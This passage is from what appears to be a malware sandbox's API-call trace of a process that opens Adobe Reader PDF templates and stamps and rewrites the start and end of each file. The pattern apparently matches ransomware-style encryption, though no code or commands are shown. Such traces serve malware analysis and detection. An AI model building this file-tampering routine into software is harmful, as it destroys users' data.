| out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xf43a [0073.612] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.612] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0073.612] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.612] CloseHandle (hObject=0x1d4) returned 1 [0073.613] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0073.613] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.613] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1d17f [0073.614] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.614] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.614] ReleaseMutex (hMutex=0x168) returned 1 [0073.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0073.614] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.616] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c17f [0073.617] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.617] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c17f [0073.617] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.617] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0073.617] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.618] CloseHandle (hObject=0x1d4) returned 1 [0073.618] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0073.618] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.618] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x11c35 [0073.619] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.619] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.619] ReleaseMutex (hMutex=0x168) returned 1 [0073.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0073.619] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.621] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x10c35 [0073.621] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.621] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x10c35 [0073.622] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.622] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0073.623] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.623] CloseHandle (hObject=0x1d4) returned 1 [0073.623] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0073.624] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.624] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xc084 [0073.624] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.624] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.625] ReleaseMutex (hMutex=0x168) returned 1 [0073.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0073.625] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.627] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xb084 [0073.628] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.628] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xb084 [0073.628] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.628] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0073.629] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.629] CloseHandle (hObject=0x1d4) returned 1 [0073.629] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0073.631] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.631] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x132cc [0073.631] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.631] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.631] ReleaseMutex (hMutex=0x168) returned 1 [0073.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0073.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0073.632] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.636] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x122cc [0073.636] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.637] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x122cc [0073.638] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.638] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0073.638] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a96a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a96a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.639] CloseHandle (hObject=0x1d4) returned 1 [0073.639] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0073.640] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.640] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2c339 [0073.640] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.640] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.641] ReleaseMutex (hMutex=0x168) returned 1 [0073.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0073.641] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0074.947] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2b339 [0074.948] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.949] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2b339 [0074.949] WriteFile (in: hFile=0x1d4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0074.949] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0074.950] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0074.950] CloseHandle (hObject=0x1d4) returned 1 [0074.950] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0074.952] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.952] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xdf82 [0074.952] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.952] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.952] ReleaseMutex (hMutex=0x168) returned 1 [0074.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0074.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0074.953] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0074.955] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xcf82 [0074.955] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.955] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xcf82 [0074.956] WriteFile (in: hFile=0x1d4, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0074.957] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0074.957] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0074.957] CloseHandle (hObject=0x1d4) returned 1 [0074.957] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0074.958] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.958] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xc084 [0074.958] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.959] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.959] ReleaseMutex (hMutex=0x168) returned 1 [0074.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0074.959] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0074.961] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xb084 [0074.961] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.963] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xb084 [0074.963] WriteFile (in: hFile=0x1d4, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0074.964] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0074.964] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0074.964] CloseHandle (hObject=0x1d4) returned 1 [0074.964] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0074.965] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.965] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x80f5 [0074.965] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.965] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.966] ReleaseMutex (hMutex=0x168) returned 1 [0074.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0074.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", 